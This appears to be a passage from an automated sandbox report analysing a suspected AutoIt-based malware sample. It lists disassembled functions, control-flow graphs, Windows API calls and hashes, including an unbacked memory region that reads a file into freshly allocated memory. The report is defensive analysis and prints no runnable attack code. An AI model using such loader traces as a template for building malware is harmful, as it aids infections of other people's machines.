                                    • Instruction Fuzzy Hash: 24219FB5951318AFDF00DFA8E889BDDBFB8FB08702F10851AE611A62A0D7B955448F91
                                    Function 007B8D45 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 300COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 313 7b8d45-7b8d55 314 7b8d6f-7b8d71 313->314 315 7b8d57-7b8d6a call 7af2c6 call 7af2d9 313->315 317 7b90d9-7b90e6 call 7af2c6 call 7af2d9 314->317 318 7b8d77-7b8d7d 314->318 332 7b90f1 315->332 337 7b90ec call 7b27ec 317->337 318->317 321 7b8d83-7b8dae 318->321 321->317 324 7b8db4-7b8dbd 321->324 325 7b8dbf-7b8dd2 call 7af2c6 call 7af2d9 324->325 326 7b8dd7-7b8dd9 324->326 325->337 330 7b8ddf-7b8de3 326->330 331 7b90d5-7b90d7 326->331 330->331 336 7b8de9-7b8ded 330->336 334 7b90f4-7b90f9 331->334 332->334 336->325 339 7b8def-7b8e06 336->339 337->332 342 7b8e08-7b8e0b 339->342 343 7b8e23-7b8e2c 339->343 344 7b8e0d-7b8e13 342->344 345 7b8e15-7b8e1e 342->345 346 7b8e4a-7b8e54 343->346 347 7b8e2e-7b8e45 call 7af2c6 call 7af2d9 call 7b27ec 343->347 344->345 344->347 350 7b8ebf-7b8ed9 345->350 348 7b8e5b-7b8e79 call 7b3820 call 7b29c8 * 2 346->348 349 7b8e56-7b8e58 346->349 377 7b900c 347->377 386 7b8e7b-7b8e91 call 7af2d9 call 7af2c6 348->386 387 7b8e96-7b8ebc call 7b9424 348->387 349->348 352 7b8edf-7b8eef 350->352 353 7b8fad-7b8fb6 call 7bf89b 350->353 352->353 358 7b8ef5-7b8ef7 352->358 364 7b9029 353->364 365 7b8fb8-7b8fca 353->365 358->353 362 7b8efd-7b8f23 358->362 362->353 367 7b8f29-7b8f3c 362->367 369 7b902d-7b9045 ReadFile 364->369 365->364 370 7b8fcc-7b8fdb GetConsoleMode 365->370 367->353 372 7b8f3e-7b8f40 367->372 374 7b90a1-7b90ac GetLastError 369->374 375 7b9047-7b904d 369->375 370->364 376 7b8fdd-7b8fe1 370->376 372->353 378 7b8f42-7b8f6d 372->378 380 7b90ae-7b90c0 call 7af2d9 call 7af2c6 374->380 381 7b90c5-7b90c8 374->381 375->374 382 7b904f 375->382 376->369 383 7b8fe3-7b8ffd ReadConsoleW 376->383 384 7b900f-7b9019 call 7b29c8 377->384 378->353 385 7b8f6f-7b8f82 378->385 380->377 393 7b90ce-7b90d0 381->393 394 7b9005-7b900b call 7af2a3 381->394 389 7b9052-7b9064 382->389 391 7b8fff GetLastError 383->391 392 7b901e-7b9027 383->392 384->334 385->353 396 7b8f84-7b8f86 385->396 386->377 387->350 389->384 399 7b9066-7b906a 389->399 391->394 392->389 393->384 394->377 396->353 403 7b8f88-7b8fa8 396->403 407 7b906c-7b907c call 7b8a61 399->407 408 7b9083-7b908e 399->408 403->353 418 7b907f-7b9081 407->418 413 7b909a-7b909f call 7b88a1 408->413 414 7b9090 call 7b8bb1 408->414 419 7b9095-7b9098 413->419 414->419 418->384 419->418
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: .z
                                    • API String ID: 0-427214572
                                    • Opcode ID: 527f1190f97516e7847ebad47c753a2d27359949b341bda923b14f25ff4015c0
                                    • Instruction ID: e60a01ec0f2adedf72c74ae1461640b32a440f81d1b1449fe58c6923d55e4c81
                                    • Opcode Fuzzy Hash: 527f1190f97516e7847ebad47c753a2d27359949b341bda923b14f25ff4015c0
                                    • Instruction Fuzzy Hash: 54C1F47490434AEFCB51EFA8D845BEDBBB4BF49310F144199F624AB392CB389941CB61
                                    Function 007C065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 421 7c065b-7c068b call 7c042f 424 7c068d-7c0698 call 7af2c6 421->424 425 7c06a6-7c06b2 call 7b5221 421->425 432 7c069a-7c06a1 call 7af2d9 424->432 430 7c06cb-7c0714 call 7c039a 425->430 431 7c06b4-7c06c9 call 7af2c6 call 7af2d9 425->431 441 7c0716-7c071f 430->441 442 7c0781-7c078a GetFileType 430->442 431->432 439 7c097d-7c0983 432->439 446 7c0756-7c077c GetLastError call 7af2a3 441->446 447 7c0721-7c0725 441->447 443 7c078c-7c07bd GetLastError call 7af2a3 CloseHandle 442->443 444 7c07d3-7c07d6 442->444 443->432 458 7c07c3-7c07ce call 7af2d9 443->458 450 7c07df-7c07e5 444->450 451 7c07d8-7c07dd 444->451 446->432 447->446 452 7c0727-7c0754 call 7c039a 447->452 455 7c07e9-7c0837 call 7b516a 450->455 456 7c07e7 450->456 451->455 452->442 452->446 463 7c0839-7c0845 call 7c05ab 455->463 464 7c0847-7c086b call 7c014d 455->464 456->455 458->432 463->464 470 7c086f-7c0879 call 7b86ae 463->470 471 7c086d 464->471 472 7c087e-7c08c1 464->472 470->439 471->470 474 7c08e2-7c08f0 472->474 475 7c08c3-7c08c7 472->475 478 7c097b 474->478 479 7c08f6-7c08fa 474->479 475->474 477 7c08c9-7c08dd 475->477 477->474 478->439 479->478 480 7c08fc-7c092f CloseHandle call 7c039a 479->480 483 7c0931-7c095d GetLastError call 7af2a3 call 7b5333 480->483 484 7c0963-7c0977 480->484 483->484 484->478
                                    APIs
                                      • Part of subcall function 007C039A: CreateFileW.KERNELBASE(00000000,00000000,?,007C0704,?,?,00000000,?,007C0704,00000000,0000000C), ref: 007C03B7
                                    • GetLastError.KERNEL32 ref: 007C076F
                                    • __dosmaperr.LIBCMT ref: 007C0776
                                    • GetFileType.KERNELBASE(00000000), ref: 007C0782
                                    • GetLastError.KERNEL32 ref: 007C078C
                                    • __dosmaperr.LIBCMT ref: 007C0795
                                    • CloseHandle.KERNEL32(00000000), ref: 007C07B5
                                    • CloseHandle.KERNEL32(?), ref: 007C08FF
                                    • GetLastError.KERNEL32 ref: 007C0931
                                    • __dosmaperr.LIBCMT ref: 007C0938
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                    • String ID: H
                                    • API String ID: 4237864984-2852464175
                                    • Opcode ID: cd8d7b05069cb0036ef1d9ff748618a059c12be56c0e9385bb7defd762acaf4e
                                    • Instruction ID: 2fc56ff1c187b4383eaf8d45850d9afafc2f73189881267938952aad834bdc3b
                                    • Opcode Fuzzy Hash: cd8d7b05069cb0036ef1d9ff748618a059c12be56c0e9385bb7defd762acaf4e
                                    • Instruction Fuzzy Hash: F4A11332A04208CFDF19AF68D855BAE7BA0AB46320F14425DF815AB3D1DB399D12CBD1
                                    Function 0078344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00783A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00851418,?,00782E7F,?,?,?,00000000), ref: 00783A78
                                      • Part of subcall function 00783357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00783379
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0078356A
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 007C318D
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 007C31CE
                                    • RegCloseKey.ADVAPI32(?), ref: 007C3210
                                    • _wcslen.LIBCMT ref: 007C3277
                                    • _wcslen.LIBCMT ref: 007C3286
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 98802146-2727554177
                                    • Opcode ID: 9f41ae0fa0d5611eefd59cff784ebb87917c9166edcfb7c21e49795221e6fa6f
                                    • Instruction ID: d608147074b66de4d22b27422dfb3ed84a5dc5b3fc7877ebc76d65ed96027ac5
                                    • Opcode Fuzzy Hash: 9f41ae0fa0d5611eefd59cff784ebb87917c9166edcfb7c21e49795221e6fa6f
                                    • Instruction Fuzzy Hash: 95717B714483019EC704EF69EC859ABBBE8FF8A741F40452EF545D7270EB789A48CB62
                                    Function 00782B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00782B8E
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00782B9D
                                    • LoadIconW.USER32(00000063), ref: 00782BB3
                                    • LoadIconW.USER32(000000A4), ref: 00782BC5
                                    • LoadIconW.USER32(000000A2), ref: 00782BD7
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00782BEF
                                    • RegisterClassExW.USER32(?), ref: 00782C40
                                      • Part of subcall function 00782CD4: GetSysColorBrush.USER32(0000000F), ref: 00782D07
                                      • Part of subcall function 00782CD4: RegisterClassExW.USER32(00000030), ref: 00782D31
                                      • Part of subcall function 00782CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00782D42
                                      • Part of subcall function 00782CD4: InitCommonControlsEx.COMCTL32(?), ref: 00782D5F
                                      • Part of subcall function 00782CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00782D6F
                                      • Part of subcall function 00782CD4: LoadIconW.USER32(000000A9), ref: 00782D85
                                      • Part of subcall function 00782CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00782D94
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 423443420-4155596026
                                    • Opcode ID: d3d78bfbc9de2ec1daeebcd1aab78dc5fa7eb2b9f6427f89fb1b42eee340d5ae
                                    • Instruction ID: fe9d61ffd7872891cda3256262c947f2d97be7b162d48d9acc22d335adb88030
                                    • Opcode Fuzzy Hash: d3d78bfbc9de2ec1daeebcd1aab78dc5fa7eb2b9f6427f89fb1b42eee340d5ae
                                    • Instruction Fuzzy Hash: FB212C74E40318ABDF109FA9EC69BE97FB8FB48B52F00455AE500A67A0D7BD4940CF94
                                    Function 00783170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 562 783170-783185 563 7831e5-7831e7 562->563 564 783187-78318a 562->564 563->564 565 7831e9 563->565 566 7831eb 564->566 567 78318c-783193 564->567 570 7831d0-7831d8 DefWindowProcW 565->570 571 7c2dfb-7c2e23 call 7818e2 call 79e499 566->571 572 7831f1-7831f6 566->572 568 783199-78319e 567->568 569 783265-78326d PostQuitMessage 567->569 574 7c2e7c-7c2e90 call 7ebf30 568->574 575 7831a4-7831a8 568->575 577 783219-78321b 569->577 576 7831de-7831e4 570->576 605 7c2e28-7c2e2f 571->605 578 7831f8-7831fb 572->578 579 78321d-783244 SetTimer RegisterWindowMessageW 572->579 574->577 599 7c2e96 574->599 581 7c2e68-7c2e72 call 7ec161 575->581 582 7831ae-7831b3 575->582 577->576 585 7c2d9c-7c2d9f 578->585 586 783201-783214 KillTimer call 7830f2 call 783c50 578->586 579->577 583 783246-783251 CreatePopupMenu 579->583 595 7c2e77 581->595 589 7c2e4d-7c2e54 582->589 590 7831b9-7831be 582->590 583->577 592 7c2dd7-7c2df6 MoveWindow 585->592 593 7c2da1-7c2da5 585->593 586->577 589->570 602 7c2e5a-7c2e63 call 7e0ad7 589->602 597 783253-783263 call 78326f 590->597 598 7831c4-7831ca 590->598 592->577 600 7c2dc6-7c2dd2 SetFocus 593->600 601 7c2da7-7c2daa 593->601 595->577 597->577 598->570 598->605 599->570 600->577 601->598 606 7c2db0-7c2dc1 call 7818e2 601->606 602->570 605->570 610 7c2e35-7c2e48 call 7830f2 call 783837 605->610 606->577 610->570
                                    APIs
                                    • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,0078316A,?,?), ref: 007831D8
                                    • KillTimer.USER32(?,00000001,?,?,?,?,?,0078316A,?,?), ref: 00783204
                                    • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00783227
                                    • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,0078316A,?,?), ref: 00783232
                                    • CreatePopupMenu.USER32 ref: 00783246
                                    • PostQuitMessage.USER32(00000000), ref: 00783267
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                    • String ID: TaskbarCreated
                                    • API String ID: 129472671-2362178303
                                    • Opcode ID: 95ee45c610e1b54a473cf541f1fa3ba4f96c247bfc967d29586eb05cad654561
                                    • Instruction ID: 993517fddab34915c4182838068d8ce297faddb46e3c2b398b55cde22d278199
                                    • Opcode Fuzzy Hash: 95ee45c610e1b54a473cf541f1fa3ba4f96c247bfc967d29586eb05cad654561
                                    • Instruction Fuzzy Hash: C14112316C0208ABDF143B7C9C1EBBD3A1AFB05F01F044129F902C62E2DBAD9A4597A1
                                    Function 01E425D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 618 1e425d0-1e4267e call 1e40000 621 1e42685-1e426ab call 1e434e0 CreateFileW 618->621 624 1e426b2-1e426c2 621->624 625 1e426ad 621->625 633 1e426c4 624->633 634 1e426c9-1e426e3 VirtualAlloc 624->634 626 1e427fd-1e42801 625->626 627 1e42843-1e42846 626->627 628 1e42803-1e42807 626->628 630 1e42849-1e42850 627->630 631 1e42813-1e42817 628->631 632 1e42809-1e4280c 628->632 637 1e428a5-1e428ba 630->637 638 1e42852-1e4285d 630->638 639 1e42827-1e4282b 631->639 640 1e42819-1e42823 631->640 632->631 633->626 635 1e426e5 634->635 636 1e426ea-1e42701 ReadFile 634->636 635->626 641 1e42703 636->641 642 1e42708-1e42748 VirtualAlloc 636->642 645 1e428bc-1e428c7 VirtualFree 637->645 646 1e428ca-1e428d2 637->646 643 1e42861-1e4286d 638->643 644 1e4285f 638->644 647 1e4282d-1e42837 639->647 648 1e4283b 639->648 640->639 641->626 649 1e4274f-1e4276a call 1e43730 642->649 650 1e4274a 642->650 651 1e42881-1e4288d 643->651 652 1e4286f-1e4287f 643->652 644->637 645->646 647->648 648->627 658 1e42775-1e4277f 649->658 650->626 655 1e4288f-1e42898 651->655 656 1e4289a-1e428a0 651->656 654 1e428a3 652->654 654->630 655->654 656->654 659 1e42781-1e427b0 call 1e43730 658->659 660 1e427b2-1e427c6 call 1e43540 658->660 659->658 665 1e427c8 660->665 666 1e427ca-1e427ce 660->666 665->626 668 1e427d0-1e427d4 FindCloseChangeNotification 666->668 669 1e427da-1e427de 666->669 668->669 670 1e427e0-1e427eb VirtualFree 669->670 671 1e427ee-1e427f7 669->671 670->671 671->621 671->626
                                    APIs
                                    • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01E426A1
                                    • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01E428C7
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateFileFreeVirtual
                                    • String ID:
                                    • API String ID: 204039940-0
                                    • Opcode ID: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                    • Instruction ID: b5b879f33b047b4e6e19bf0b35ba1daeb8b32d30827ef02a93d095d13faef510
                                    • Opcode Fuzzy Hash: e364f936384ad5a75a3e6820b612275e2b186d73597ef444eab7978b091760cf
                                    • Instruction Fuzzy Hash: E6A1FB74E0020AEBEB14CFA4E998BEEBBB5FF48304F109559E601BB281D7759A41CB54
                                    Function 00782C63 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 682 782c63-782cd3 CreateWindowExW * 2 ShowWindow * 2
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00782C91
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00782CB2
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00781CAD,?), ref: 00782CC6
                                    • ShowWindow.USER32(00000000,?,?,?,?,?,?,00781CAD,?), ref: 00782CCF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: e4b29f68a369efd2e53f96ee8f0e0f63225d82db4525d7a23ba349d37c03b7e1
                                    • Instruction ID: f71d8e86f69f90fc2f80137b962345cc8e124d8cdaf57e3d5d5338cd61098110
                                    • Opcode Fuzzy Hash: e4b29f68a369efd2e53f96ee8f0e0f63225d82db4525d7a23ba349d37c03b7e1
                                    • Instruction Fuzzy Hash: FAF017755803907AEB200717AC1CFF72EBDFBC6F62B01401AF904A22A0C2690840DAB0
                                    Function 01E423B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 139fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 797 1e423b0-1e424c5 call 1e40000 call 1e422a0 CreateFileW 804 1e424c7 797->804 805 1e424cc-1e424dc 797->805 806 1e4257c-1e42581 804->806 808 1e424e3-1e424fd VirtualAlloc 805->808 809 1e424de 805->809 810 1e42501-1e42518 ReadFile 808->810 811 1e424ff 808->811 809->806 812 1e4251c-1e42556 call 1e422e0 call 1e412a0 810->812 813 1e4251a 810->813 811->806 818 1e42572-1e4257a ExitProcess 812->818 819 1e42558-1e4256d call 1e42330 812->819 813->806 818->806 819->818
                                    APIs
                                      • Part of subcall function 01E422A0: Sleep.KERNELBASE(000001F4), ref: 01E422B1
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01E424BB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1707404067.0000000001E40000.00000040.00001000.00020000.00000000.sdmp, Offset: 01E40000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_1e40000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 2RTZRRXZMKRN1KM
                                    • API String ID: 2694422964-3181753370
                                    • Opcode ID: 0da70de9a8ecd7b584842bd70278889f4c95dcc362b35b58f9923bd34bedda97
                                    • Instruction ID: 5dc5dd13c4ed90da71421eda66753e9c15b14ff4dfe7896090f2ea9c6885ad8c
                                    • Opcode Fuzzy Hash: 0da70de9a8ecd7b584842bd70278889f4c95dcc362b35b58f9923bd34bedda97
                                    • Instruction Fuzzy Hash: 6E515C30D0424ADBEF11DBA4D854BEEBB75AF59300F0041A9E609BB2C0D7B91B45CBA6
                                    Function 007F2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    APIs
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007F2C05
                                    • DeleteFileW.KERNEL32(?), ref: 007F2C87
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007F2C9D
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007F2CAE
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007F2CC0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$Delete$Copy
                                    • String ID:
                                    • API String ID: 3226157194-0
                                    • Opcode ID: d17724dcada9b66545bf61cc831830825c0a59ccc2346fd2329660e85a062f73
                                    • Instruction ID: f81dc5bded6662b57d1dff8daba46d7d955d91b8b099ac691bfd0640fc9cc7c6
                                    • Opcode Fuzzy Hash: d17724dcada9b66545bf61cc831830825c0a59ccc2346fd2329660e85a062f73
                                    • Instruction Fuzzy Hash: 17B14F7190011DEBDF11EBA4CC89EEE777DEF49350F1040A6F609E6242EA389A458F61
                                    Function 007B5AA9 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 186COMMONLIBRARYCODE
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 927 7b5aa9-7b5ace 928 7b5ad0-7b5ad2 927->928 929 7b5ad7-7b5ad9 927->929 930 7b5ca5-7b5cb4 call 7a0a8c 928->930 931 7b5adb-7b5af5 call 7af2c6 call 7af2d9 call 7b27ec 929->931 932 7b5afa-7b5b1f 929->932 931->930 933 7b5b21-7b5b24 932->933 934 7b5b26-7b5b2c 932->934 933->934 937 7b5b4e-7b5b53 933->937 938 7b5b4b 934->938 939 7b5b2e-7b5b46 call 7af2c6 call 7af2d9 call 7b27ec 934->939 943 7b5b55-7b5b61 call 7b9424 937->943 944 7b5b64-7b5b6d call 7b564e 937->944 938->937 976 7b5c9c-7b5c9f 939->976 943->944 954 7b5ba8-7b5bba 944->954 955 7b5b6f-7b5b71 944->955 961 7b5bbc-7b5bc2 954->961 962 7b5c02-7b5c23 WriteFile 954->962 958 7b5b73-7b5b78 955->958 959 7b5b95-7b5b9e call 7b542e 955->959 963 7b5b7e-7b5b8b call 7b55e1 958->963 964 7b5c6c-7b5c7e 958->964 975 7b5ba3-7b5ba6 959->975 969 7b5bf2-7b5c00 call 7b56c4 961->969 970 7b5bc4-7b5bc7 961->970 967 7b5c2e 962->967 968 7b5c25-7b5c2b GetLastError 962->968 985 7b5b8e-7b5b90 963->985 973 7b5c89-7b5c99 call 7af2d9 call 7af2c6 964->973 974 7b5c80-7b5c83 964->974 977 7b5c31-7b5c3c 967->977 968->967 969->975 978 7b5bc9-7b5bcc 970->978 979 7b5be2-7b5bf0 call 7b5891 970->979 973->976 974->973 983 7b5c85-7b5c87 974->983 975->985 989 7b5ca4 976->989 986 7b5c3e-7b5c43 977->986 987 7b5ca1 977->987 978->964 988 7b5bd2-7b5be0 call 7b57a3 978->988 979->975 983->989 985->977 992 7b5c69 986->992 993 7b5c45-7b5c4a 986->993 987->989 988->975 989->930 992->964 997 7b5c4c-7b5c5e call 7af2d9 call 7af2c6 993->997 998 7b5c60-7b5c67 call 7af2a3 993->998 997->976 998->976
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: JOx
                                    • API String ID: 0-2876472256
                                    • Opcode ID: 913448d74a68e9f0a1628d9b978326e46b89348e21110a8e1fbaed9109a106d7
